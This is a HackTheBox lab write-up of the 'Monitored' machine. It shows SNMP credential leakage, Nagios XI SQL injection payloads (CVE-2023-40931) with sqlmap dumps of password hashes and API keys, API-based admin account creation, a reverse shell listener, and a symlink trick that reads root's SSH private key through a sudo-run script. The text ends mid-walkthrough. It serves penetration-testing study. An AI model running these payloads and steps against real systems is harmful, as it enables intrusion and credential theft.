WriteupsHTB — Monitored
WebMediumLinux
HTB — Monitored
Nagios XI SNMP credential leak, auth bypass CVE-2023-40931 for API key theft. SQL injection creates admin account for RCE via malicious script.
January 19, 2025HackTheBox
#Nagios#SNMP#SQLi#CVE-2023-40931
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.248
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-19 13:57 EST
Nmap scan report for 10.10.11.248
Host is up (0.024s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 61:e2:e7:b4:1b:5d:46:dc:3b:2f:91:38:e6:6d:c5:ff (RSA)
| 256 29:73:c5:a5:8d:aa:3f:60:a9:4a:a3:e5:9f:67:5c:93 (ECDSA)
|_ 256 6d:7a:f9:eb:8e:45:c2:02:6a:d5:8d:4d:b3:a3:37:6f (ED25519)
80/tcp open http Apache httpd 2.4.56
|_http-title: Did not follow redirect to https://nagios.monitored.htb/
|_http-server-header: Apache/2.4.56 (Debian)
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
443/tcp open ssl/http Apache httpd 2.4.56 ((Debian))
|_http-title: Nagios XI
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK
| Not valid before: 2023-11-11T21:46:55
|_Not valid after: 2297-08-25T21:46:55
|_http-server-header: Apache/2.4.56 (Debian)
|_ssl-date: TLS randomness does not represent time
5667/tcp open tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/19%OT=22%CT=1%CU=35966%PV=Y%DS=2%DC=T%G=Y%TM=678D
OS:4B49%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)
OS:OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53C
OS:ST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
OS:ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF
OS:=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)
Network Distance: 2 hops
Service Info: Host: nagios.monitored.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 24.29 ms 10.10.14.1
2 24.37 ms 10.10.11.248
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.52 secondsnmap udp
sh
sudo nmap -sU -sV -sC -p U:161,22,110,143,993,995 10.10.11.248
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-19 14:09 EST
Stats: 0:00:48 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.64% done; ETC: 14:10 (0:00:01 remaining)
Nmap scan report for nagios.monitored.htb (10.10.11.248)
Host is up (0.025s latency).
PORT STATE SERVICE VERSION
22/udp closed ssh
110/udp closed pop3
143/udp closed imap
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 6f3fa7421af94c6500000000
| snmpEngineBoots: 36
|_ snmpEngineTime: 13m04s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 284.36 Kb sent, 284.36 Kb received
| VMware VMXNET3 Ethernet Controller
| IP address: 10.10.11.248 Netmask: 255.255.254.0
| MAC address: 00:50:56:b0:33:f5 (VMware)
| Type: ethernetCsmacd Speed: 4 Gbps
|_ Traffic stats: 28.32 Mb sent, 22.05 Mb received
| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:389 0.0.0.0:0
| TCP 127.0.0.1:25 0.0.0.0:0
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.1:5432 0.0.0.0:0
| TCP 127.0.0.1:7878 0.0.0.0:0
| TCP 127.0.0.1:40660 127.0.1.1:80
| TCP 127.0.0.1:40676 127.0.1.1:80
| UDP 0.0.0.0:68 *:*
| UDP 0.0.0.0:123 *:*
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:162 *:*
| UDP 10.10.11.248:123 *:*
|_ UDP 127.0.0.1:123 *:*
| snmp-processes:
| 1:
| Name: systemdsh
HOST-RESOURCES-MIB::hrSWRunParameters.1421 = STRING: "-c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB"- loooking at this post https://support.nagios.com/forum/viewtopic.php?t=58783
sh
curl -XPOST -k -L 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate?pretty=1' -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=10000'
{
"username": "svc",
"user_id": "2",
"auth_token": "75017157e9940eec5dc63a15a31d4e07d0df85ae",
"valid_min": 10000,
"valid_until": "Sun, 26 Jan 2025 13:30:27 -0500"sh
curl -k -L 'https://nagios.monitored.htb/nagiosxi/e&host=localhost&token=56a204978926b0f1e368f07eb52b6e6ce61e632c' > image.png
- trying just appending the token will get us to the dashboard
Nagios XI v5.11.0 - SQL Injection
- https://rootsecdev.medium.com/notes-from-the-field-exploiting-nagios-xi-sql-injection-cve-2023-40931-9d5dd6563f8c
txt
---
Parameter: id (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2301=2301) THEN 1 ELSE (SELECT 5672 UNION SELECT 1926) END))
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: action=acknowledge_banner_message&id=1 OR (SELECT 1415 FROM(SELECT COUNT(*),CONCAT(0x7178766b71,(SELECT (ELT(1415=1415,1))),0x7162787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=acknowledge_banner_message&id=1 AND (SELECT 5295 FROM (SELECT(SLEEP(5)))DuyK)
sh
sqlmap -r req.txt --batch --random-agent -p id --dbs
[17:39:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.56
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[17:39:29] [INFO] fetching database names
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[17:39:29] [INFO] retrieved: 'information_schema'
[17:39:29] [INFO] retrieved: 'nagiosxi'
available databases [2]:
[*] information_schema
[*] nagiosxish
sqlmap -r req.txt --batch --random-agent -p id -D nagiosxi --tables
Database: nagiosxi
[22 tables]
+-----------------------------+
| xi_auditlog |
| xi_auth_tokens |
| xi_banner_messages |
| xi_cmp_ccm_backups |
| xi_cmp_favorites |
| xi_cmp_nagiosbpi_backups |
| xi_cmp_scheduledreports_log |
| xi_cmp_trapdata |
| xi_cmp_trapdata_log |
| xi_commands |
| xi_deploy_agents |
| xi_deploy_jobs |
| xi_eventqueue |
| xi_events |
| xi_link_users_messages |
| xi_meta |
| xi_mibs |
| xi_options |
| xi_sessions |
| xi_sysstat |
| xi_usermeta |
| xi_users |
+-----------------------------+sh
sqlmap -r req.txt --batch --random-agent -p id -D nagiosxi -T xi_users --dumpsh
Database: nagiosxi
Table: xi_users
[2 entries]
+---------+---------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| user_id | email | name | api_key | enabled | password | username | created_by | last_login | api_enabled | last_edited | created_time | last_attempt | backend_ticket | last_edited_by | login_attempts | last_password_change |
+---------+---------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| 1 | admin@monitored.htb | Nagios Administrator | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL | 1 | $2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C | nagiosadmin | 0 | 1701931372 | 1 | 1701427555 | 0 | 1737317363 | IoAaeXNLvtDkH5PaGqV2XZ3vMZJLMDR0 | 5 | 5 | 1701427555 |
| 2 | svc@monitored.htb | svc | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK | 0 | $2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK | svc | 1 | 1699724476 | 1 | 1699728200 | 1699634403 | 1737317353 | 6oWBPbarHY4vejimmu3K8tpZBNrdHpDgdUEs5P2PFZYpXSuIdrRMYgk66A0cjNjq | 1 | 14 | 1699697433 sh
curl -k --silent "https://nagios.monitored.htb/nagiosxi/api/v1/system/user&apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL" -d "name=hacker&username=hacker&password=Password123&email=hacker@email.com&auth_level=admin"
{"success":"User account hacker was added successfully!","user_id":6}- login with the newly created credentials
rev shell
sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.248] 51610
whoami
nagiossh
python3 -c 'import pty; pty.spawn("/bin/bash")'user.txt
sh
nagios@monitored:~$ cat user.txt
cat user.txt
11c38a99...priv esc
sudo
sh
nagios@monitored:~$ sudo -l
sudo -l
Matching Defaults entries for nagios on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User nagios may run the following commands on localhost:
(root) NOPASSWD: /etc/init.d/nagios start
(root) NOPASSWD: /etc/init.d/nagios stop
(root) NOPASSWD: /etc/init.d/nagios restart
(root) NOPASSWD: /etc/init.d/nagios reload
(root) NOPASSWD: /etc/init.d/nagios status
(root) NOPASSWD: /etc/init.d/nagios checkconfig
(root) NOPASSWD: /etc/init.d/npcd start
(root) NOPASSWD: /etc/init.d/npcd stop
(root) NOPASSWD: /etc/init.d/npcd restart
(root) NOPASSWD: /etc/init.d/npcd reload
(root) NOPASSWD: /etc/init.d/npcd status
(root) NOPASSWD: /usr/bin/php
/usr/local/nagiosxi/scripts/components/autodiscover_new.php *
(root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
(root) NOPASSWD: /usr/bin/php
/usr/local/nagiosxi/scripts/migrate/migrate.php *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *sh
nagios@monitored:~$ ls -al /usr/local/nagiosxi/tmp/phpmailer.log
ls -al /usr/local/nagiosxi/tmp/phpmailer.log
-rw-r--r-- 1 nagios nagios 0 Nov 10 2023 /usr/local/nagiosxi/tmp/phpmailer.loggetprofile.sh
sh
nagios@monitored:~$ cat /usr/local/nagiosxi/scripts/components/getprofile.sh
cat /usr/local/nagiosxi/scripts/components/getprofile.sh
#!/bin/bash
# GRAB THE ID
folder=$1
if [ "$folder" == "" ]; then
echo "You must enter a folder name/id to generate a profile."
echo "Example: ./getprofile.sh <id>"
exit 1
fi
# Clean the folder name
folder=$(echo "$folder" | sed -e 's/[^[:alnum:]|-]//g')
# Get OS & version
if which lsb_release &>/dev/null; then
distro=`lsb_release -si`
version=`lsb_release -sr`
elif [ -r /etc/redhat-release ]; then
if rpm -q centos-release; then
distro=CentOS
elif rpm -q sl-release; then
distro=Scientific
elif [ -r /etc/oracle-release ]; then
distro=OracleServer
elif rpm -q cloudlinux-release; then
distro=CloudLinux
elif rpm -q fedora-release; then
distro=Fedora
elif rpm -q redhat-release || rpm -q redhat-release-server; then
distro=RedHatEnterpriseServer
fi >/dev/null
version=`sed 's/.*release \([0-9.]\+\).*/\1/' /etc/redhat-release`
else
# Release is not RedHat or CentOS, let's start by checking for SuSE
# or we can just make the last-ditch effort to find out the OS by sourcing os-release if it exists
if [ -r /etc/os-release ]; then
source /etc/os-release
if [ -n "$NAME" ]; then
distro=$NAME
version=$VERSION_ID
fi
fi
fi
ver="${version%%.*}"
# Make a clean folder (but save profile.html)
rm -rf "/usr/local/nagiosxi/var/components/profile/$folder/"
mkdir "/usr/local/nagiosxi/var/components/profile/$folder/"
mv -f "/usr/local/nagiosxi/tmp/profile-$folder.html" "/usr/local/nagiosxi/var/components/profile/$folder/profile.html"
# Create the folder setup
mkdir -p "/usr/local/nagiosxi/var/components/profile/$folder/nagios-logs"
mkdir -p "/usr/local/nagiosxi/var/components/profile/$folder/logs"
mkdir -p "/usr/local/nagiosxi/var/components/profile/$folder/versions"
echo "-------------------Fetching Information-------------------"
echo "Please wait......."
echo "Creating system information..."
echo "$distro" > "/usr/local/nagiosxi/var/components/profile/$folder/hostinfo.txt"
echo "$version" >> "/usr/local/nagiosxi/var/components/profile/$folder/hostinfo.txt"
echo "Creating nagios.txt..."
nagios_log_file=$(cat /usr/local/nagios/etc/nagios.cfg | sed -n -e 's/^log_file=//p' | sed 's/\r$//')
tail -n500 "$nagios_log_file" &> "/usr/local/nagiosxi/var/components/profile/$folder/nagios-logs/nagios.txt"
echo "Creating perfdata.txt..."
perfdata_log_file=$(cat /usr/local/nagios/etc/pnp/process_perfdata.cfg | sed -n -e 's/^LOG_FILE = //p')
tail -n500 "$perfdata_log_file" &> "/usr/local/nagiosxi/var/components/profile/$folder/nagios-logs/perfdata.txt"
echo "Creating npcd.txt..."
npcd_log_file=$(cat /usr/local/nagios/etc/pnp/npcd.cfg | sed -n -e 's/^log_file = //p')
tail -n500 "$npcd_log_file" &> "/usr/local/nagiosxi/var/components/profile/$folder/nagios-logs/npcd.txt"
echo "Creating cmdsubsys.txt..."
tail -n500 /usr/local/nagiosxi/var/cmdsubsys.log > "/usr/local/nagiosxi/var/components/profile/$folder/nagios-logs/cmdsubsys.txt"
echo "Creating event_handler.txt..."
tail -n500 /usr/local/nagiosxi/var/event_handler.log > "/usr/local/nagiosxi/var/components/profile/$folder/nagios-logs/event_handler.txt"
echo "Creating eventman.txt..."
tail -n500 /usr/local/nagiosxi/var/eventman.log > "/usr/local/nagiosxi/var/components/profile/$folder/nagios-logs/eventman.txt"
echo "Creating perfdataproc.txt..."
tail -n500 /usr/local/nagiosxi/var/perfdataproc.log > "/usr/local/nagiosxi/var/components/profile/$folder/nagios-logs/perfdataproc.txt"
echo "Creating sysstat.txt..."
tail -n500 /usr/local/nagiosxi/var/sysstat.log > "/usr/local/nagiosxi/var/components/profile/$folder/nagios-logs/sysstat.txt"
echo "Creating systemlog.txt..."
if [ -f /var/log/messages ]; then
/usr/bin/tail -n1000 /var/log/messages > "/usr/local/nagiosxi/var/components/profile/$folder/logs/messages.txt"
elif [ -f /var/log/syslog ]; then
/usr/bin/tail -n1000 /var/log/syslog > "/usr/local/nagiosxi/var/components/profile/$folder/logs/messages.txt"
fi
echo "Retrieving all snmp logs..."
if [ -f /var/log/snmptrapd.log ]; then
/usr/bin/tail -n1000 /var/log/snmptrapd.log > "/usr/local/nagiosxi/var/components/profile/$folder/logs/snmptrapd.txt"
fi
if [ -f /var/log/snmptt/snmptt.log ]; then
/usr/bin/tail -n1000 /var/log/snmptt/snmptt.log > "/usr/local/nagiosxi/var/components/profile/$folder/logs/snmptt.txt"
fi
if [ -f /var/log/snmptt/snmpttsystem.log ]; then
/usr/bin/tail -n1000 /var/log/snmptt/snmpttsystem.log > "/usr/local/nagiosxi/var/components/profile/$folder/logs/snmpttsystem.txt"
fi
if [ -f /var/log/snmpttunknown.log ]; then
/usr/bin/tail -n1000 /var/log/snmpttunknown.log > "/usr/local/nagiosxi/var/components/profile/$folder/logs/snmpttunknown.log.txt"
fi
echo "Creating apacheerrors.txt..."
if [ -d /var/log/httpd ]; then
for a in $(ls /var/log/httpd)
do
/usr/bin/tail -n1000 /var/log/httpd/$a > "/usr/local/nagiosxi/var/components/profile/$folder/logs/$a.txt"
done
elif [ -d /var/log/apache2 ]; then
for a in $(ls /var/log/apache2)
do
/usr/bin/tail -n1000 /var/log/apache2/$a > "/usr/local/nagiosxi/var/components/profile/$folder/logs/$a.txt"
done
fi
echo "Creating mysqllog.txt..."
# Determine if MySQL or MariaDB is localhost
db_host=$(
php -r '
define("CFG_ONLY", 1);
require_once($argv[1]);
print(@$cfg["db_info"]["ndoutils"]["dbserver"] . "\n");
' \
'/usr/local/nagiosxi/html/config.inc.php' 2>/dev/null |
tail -1
)
echo "The database host is $db_host" > "/usr/local/nagiosxi/var/components/profile/$folder/logs/database_host.txt"
if [ "$db_host" == "localhost" ]; then
if [ -f /var/log/mysqld.log ]; then
/usr/bin/tail -n500 /var/log/mysqld.log > "/usr/local/nagiosxi/var/components/profile/$folder/logs/database_log.txt"
elif [ -f /var/log/mariadb/mariadb.log ]; then
/usr/bin/tail -n500 /var/log/mariadb/mariadb.log > "/usr/local/nagiosxi/var/components/profile/$folder/logs/database_log.txt"
elif [ -f /var/log/mysql/mysql.log ]; then
/usr/bin/tail -n500 /var/log/mysql/mysql.log > "/usr/local/nagiosxi/var/components/profile/$folder/logs/database_log.txt"
fi
# Check if we are running with postgresql
$(grep -q pgsql /usr/local/nagiosxi/html/config.inc.php)
if [ $? -eq 0 ]; then
echo "Getting xi_users..."
echo 'select * from xi_users;' | psql nagiosxi nagiosxi > "/usr/local/nagiosxi/var/components/profile/$folder/xi_users.txt"
echo "Getting xi_usermeta..."
echo 'select * from xi_usermeta;' | psql nagiosxi nagiosxi > "/usr/local/nagiosxi/var/components/profile/$folder/xi_usermeta.txt"
echo "Getting xi_options(mail)..."
echo 'select * from xi_options;' | psql nagiosxi nagiosxi | grep mail > "/usr/local/nagiosxi/var/components/profile/$folder/xi_options_mail.txt"
echo "Getting xi_otions(smtp)..."
echo 'select * from xi_options;' | psql nagiosxi nagiosxi | grep smtp > "/usr/local/nagiosxi/var/components/profile/$folder/xi_options_smtp.txt"
else
echo "Getting xi_users..."
echo 'select * from xi_users;' | mysql -u root -pnagiosxi nagiosxi -t > "/usr/local/nagiosxi/var/components/profile/$folder/xi_users.txt"
echo "Getting xi_usermeta..."
echo 'select * from xi_usermeta;' | mysql -u root -pnagiosxi nagiosxi -t > "/usr/local/nagiosxi/var/components/profile/$folder/xi_usermeta.txt"
echo "Getting xi_options(mail)..."
echo 'select * from xi_options;' | mysql -t -u root -pnagiosxi nagiosxi | grep mail > "/usr/local/nagiosxi/var/components/profile/$folder/xi_options_mail.txt"
echo "Getting xi_otions(smtp)..."
echo 'select * from xi_options;' | mysql -t -u root -pnagiosxi nagiosxi | grep smtp > "/usr/local/nagiosxi/var/components/profile/$folder/xi_options_smtp.txt"
fi
if which mysqladmin >/dev/null 2>&1; then
errlog=$(mysqladmin -u root -pnagiosxi variables | grep log_error)
if [ $? -eq 0 ] && [ -f "$errlog" ]; then
/usr/bin/tail -n500 "$errlog" > "/usr/local/nagiosxi/var/components/profile/$folder/logs/database_errors.txt"
fi
fi
# Do manual check also, just in case we didn't get a log
if [ -f /var/log/mysql.err ]; then
/usr/bin/tail -n500 /var/log/mysql.err > "/usr/local/nagiosxi/var/components/profile/$folder/logs/database_errors.txt"
elif [ -f /var/log/mysql/error.log ]; then
/usr/bin/tail -n500 /var/log/mysql/error.log > "/usr/local/nagiosxi/var/components/profile/$folder/logs/database_errors.txt"
elif [ -f /var/log/mariadb/error.log ]; then
/usr/bin/tail -n500 /var/log/mariadb/error.log > "/usr/local/nagiosxi/var/components/profile/$folder/logs/database_errors.txt"
fi
fi
echo "Creating a sanatized copy of config.inc.php..."
cp /usr/local/nagiosxi/html/config.inc.php "/usr/local/nagiosxi/var/components/profile/$folder/config.inc.php"
sed -i '/pwd/d' "/usr/local/nagiosxi/var/components/profile/$folder/config.inc.php"
sed -i '/password/d' "/usr/local/nagiosxi/var/components/profile/$folder/config.inc.php"
echo "Creating memorybyprocess.txt..."
ps aux --sort -rss > "/usr/local/nagiosxi/var/components/profile/$folder/memorybyprocess.txt"
echo "Creating filesystem.txt..."
df -h > "/usr/local/nagiosxi/var/components/profile/$folder/filesystem.txt"
echo "" >> "/usr/local/nagiosxi/var/components/profile/$folder/filesystem.txt"
df -i >> "/usr/local/nagiosxi/var/components/profile/$folder/filesystem.txt"
echo "Dumping PS - AEF to psaef.txt..."
ps -aef > "/usr/local/nagiosxi/var/components/profile/$folder/psaef.txt"
echo "Creating top log..."
top -b -n 1 > "/usr/local/nagiosxi/var/components/profile/$folder/top.txt"
echo "Creating sar log..."
sar 1 5 > "/usr/local/nagiosxi/var/components/profile/$folder/sar.txt"
FILE=$(ls /usr/local/nagiosxi/nom/checkpoints/nagioscore/ | sort -n -t _ -k 2 | grep .gz | tail -1)
cp "/usr/local/nagiosxi/nom/checkpoints/nagioscore/$FILE" "/usr/local/nagiosxi/var/components/profile/$folder/"
echo "Copying objects.cache..."
objects_cache_file=$(cat /usr/local/nagios/etc/nagios.cfg | sed -n -e 's/^object_cache_file=//p' | tr -d '\r')
cp "$objects_cache_file" "/usr/local/nagiosxi/var/components/profile/$folder/"
echo "Copying MRTG Configs..."
tar -pczf "/usr/local/nagiosxi/var/components/profile/$folder/mrtg.tar.gz" /etc/mrtg/
echo "Counting Performance Data Files..."
spool_perfdata_location=$(cat /usr/local/nagios/etc/pnp/npcd.cfg | sed -n -e 's/^perfdata_spool_dir = //p')
echo "Total files in $spool_perfdata_location" > "/usr/local/nagiosxi/var/components/profile/$folder/file_counts.txt"
ls -al "$spool_perfdata_location" | wc -l >> "/usr/local/nagiosxi/var/components/profile/$folder/file_counts.txt"
echo "" >> "/usr/local/nagiosxi/var/components/profile/$folder/file_counts.txt"
spool_xidpe_location=$(cat /usr/local/nagios/etc/commands.cfg | sed -n -e 's/\$TIMET\$.perfdata.host//p' | sed -n -e 's/\s*command_line\s*\/bin\/mv\s//p' | sed -n -e 's/.*\s//p')
echo "Total files in $spool_xidpe_location" >> "/usr/local/nagiosxi/var/components/profile/$folder/file_counts.txt"
ls -al "$spool_xidpe_location" | wc -l >> "/usr/local/nagiosxi/var/components/profile/$folder/file_counts.txt"
echo "" >> "/usr/local/nagiosxi/var/components/profile/$folder/file_counts.txt"
echo "Counting MRTG Files..."
echo "Total files in /etc/mrtg/conf.d/" >> "/usr/local/nagiosxi/var/components/profile/$folder/file_counts.txt"
ls -al /etc/mrtg/conf.d/ | wc -l >> "/usr/local/nagiosxi/var/components/profile/$folder/file_counts.txt"
echo "" >> "/usr/local/nagiosxi/var/components/profile/$folder/file_counts.txt"
echo "Total files in /var/lib/mrtg/" >> "/usr/local/nagiosxi/var/components/profile/$folder/file_counts.txt"
ls -al /var/lib/mrtg/ | wc -l >> "/usr/local/nagiosxi/var/components/profile/$folder/file_counts.txt"
echo "" >> "/usr/local/nagiosxi/var/components/profile/$folder/file_counts.txt"
echo "Getting Network Information..."
ip addr > "/usr/local/nagiosxi/var/components/profile/$folder/ip_addr.txt"
echo "Getting CPU info..."
cat /proc/cpuinfo > "/usr/local/nagiosxi/var/components/profile/$folder/cpuinfo.txt"
echo "Getting memory info..."
free -m > "/usr/local/nagiosxi/var/components/profile/$folder/meminfo.txt"
echo "Getting ipcs Information..."
ipcs > "/usr/local/nagiosxi/var/components/profile/$folder/ipcs.txt"
echo "Getting SSH terminal / shellinabox yum info..."
if [ `command -v yum` ]; then
yum info shellinabox > "/usr/local/nagiosxi/var/components/profile/$folder/versions/shellinabox.txt"
else
apt-cache show shellinabox > "/usr/local/nagiosxi/var/components/profile/$folder/versions/shellinabox.txt"
fi
echo "Getting Nagios Core version..."
/usr/local/nagios/bin/nagios --version > "/usr/local/nagiosxi/var/components/profile/$folder/versions/nagios.txt"
echo "Getting NPCD version..."
/usr/local/nagios/bin/npcd --version > "/usr/local/nagiosxi/var/components/profile/$folder/versions/npcd.txt"
echo "Getting NRPE version..."
/usr/local/nagios/bin/nrpe --version > "/usr/local/nagiosxi/var/components/profile/$folder/versions/nrpe.txt"
echo "Getting NSCA version..."
/usr/local/nagios/bin/nsca --version > "/usr/local/nagiosxi/var/components/profile/$folder/versions/nsca.txt"
echo "Getting NagVis version..."
grep -i const_version /usr/local/nagvis/share/server/core/defines/global.php > "/usr/local/nagiosxi/var/components/profile/$folder/versions/nagvis.txt"
echo "Getting WKTMLTOPDF version..."
/usr/bin/wkhtmltopdf --version > "/usr/local/nagiosxi/var/components/profile/$folder/versions/wkhtmltopdf.txt"
echo "Getting Nagios-Plugins version..."
su -s /bin/bash nagios -c "/usr/local/nagios/libexec/check_ping --version" > "/usr/local/nagiosxi/var/components/profile/$folder/versions/nagios-plugins.txt"
echo "Getting BPI configs..."
mkdir -p "/usr/local/nagiosxi/var/components/profile/$folder/bpi/"
cp /usr/local/nagiosxi/etc/components/bpi.conf* "/usr/local/nagiosxi/var/components/profile/$folder/bpi/"
echo "Getting Firewall information..."
if which iptables >/dev/null 2>&1; then
echo "iptables -S" > "/usr/local/nagiosxi/var/components/profile/$folder/iptables.txt"
echo "-----------" >> "/usr/local/nagiosxi/var/components/profile/$folder/iptables.txt"
iptables -S >> "/usr/local/nagiosxi/var/components/profile/$folder/iptables.txt" 2>&1
fi
if which firewall-cmd >/dev/null 2>&1; then
echo "firewall-cmd --list-all-zones" > "/usr/local/nagiosxi/var/components/profile/$folder/firewalld.txt"
echo "-----------" >> "/usr/local/nagiosxi/var/components/profile/$folder/firewalld.txt"
firewall-cmd --list-all-zones >> "/usr/local/nagiosxi/var/components/profile/$folder/firewalld.txt" 2>&1
fi
if which ufw >/dev/null 2>&1; then
echo "ufw status" > "/usr/local/nagiosxi/var/components/profile/$folder/ufw.txt"
echo "-----------" >> "/usr/local/nagiosxi/var/components/profile/$folder/ufw.txt"
ufw status >> "/usr/local/nagiosxi/var/components/profile/$folder/ufw.txt" 2>&1
fi
echo "Getting maillog..."
tail -100 /var/log/maillog > "/usr/local/nagiosxi/var/components/profile/$folder/maillog"
echo "Getting phpmailer.log..."
if [ -f /usr/local/nagiosxi/tmp/phpmailer.log ]; then
tail -100 /usr/local/nagiosxi/tmp/phpmailer.log > "/usr/local/nagiosxi/var/components/profile/$folder/phpmailer.log"
fi
echo "Getting nom data..."
error_txt=$(ls -t /usr/local/nagiosxi/nom/checkpoints/nagioscore/errors/*.txt | head -n 1)
error_tar_gz=$(ls -t /usr/local/nagiosxi/nom/checkpoints/nagioscore/errors/*.tar.gz | head -n 1)
sql_gz=$(ls -t /usr/local/nagiosxi/nom/checkpoints/nagiosxi/*.sql.gz | head -n 1)
mkdir -p "/usr/local/nagiosxi/var/components/profile/$folder/nom/"
mkdir -p "/usr/local/nagiosxi/var/components/profile/$folder/nom/checkpoints/nagioscore/"
mkdir -p "/usr/local/nagiosxi/var/components/profile/$folder/nom/checkpoints/nagiosxi/"
mkdir -p "/usr/local/nagiosxi/var/components/profile/$folder/nom/checkpoints/nagioscore/errors/"
cp -rf "$error_txt" "/usr/local/nagiosxi/var/components/profile/$folder/nom/checkpoints/nagioscore/errors/"
cp -rf "$error_tar_gz" "/usr/local/nagiosxi/var/components/profile/$folder/nom/checkpoints/nagioscore/errors/"
cp -rf "$sql_gz" "/usr/local/nagiosxi/var/components/profile/$folder/nom/checkpoints/nagiosxi/"
echo "Zipping logs directory..."
## temporarily change to that directory, zip, then leave
(
ts=$(date +%s)
cd /usr/local/nagiosxi/var/components/profile
mv "$folder" "profile-$ts"
zip -r profile.zip "profile-$ts"
rm -rf "profile-$ts"
mv -f profile.zip ../
)
echo "Backup and Zip complete!"
Abusing Symlink
The phpmailer.log file is owned by nagios:
sh
nagios@monitored:~$ ls -al /usr/local/nagiosxi/tmp/phpmailer.log
ls -al /usr/local/nagiosxi/tmp/phpmailer.log
-rw-r--r-- 1 nagios nagios 0 Nov 10 2023 /usr/local/nagiosxi/tmp/phpmailer.logThat means I can modify it. The existing it empty. I’ll overwrite it with a symlink:
sh
ln -sf /root/.ssh/id_rsa /usr/local/nagiosxi/tmp/phpmailer.log
ls -l /usr/local/nagiosxi/tmp/phpmailer.logsh
nagios@monitored:~$ sudo /usr/local/nagiosxi/scripts/components/getprofile.sh testThe resulting file is in /usr/local/nagiosxi/var/components:
sh
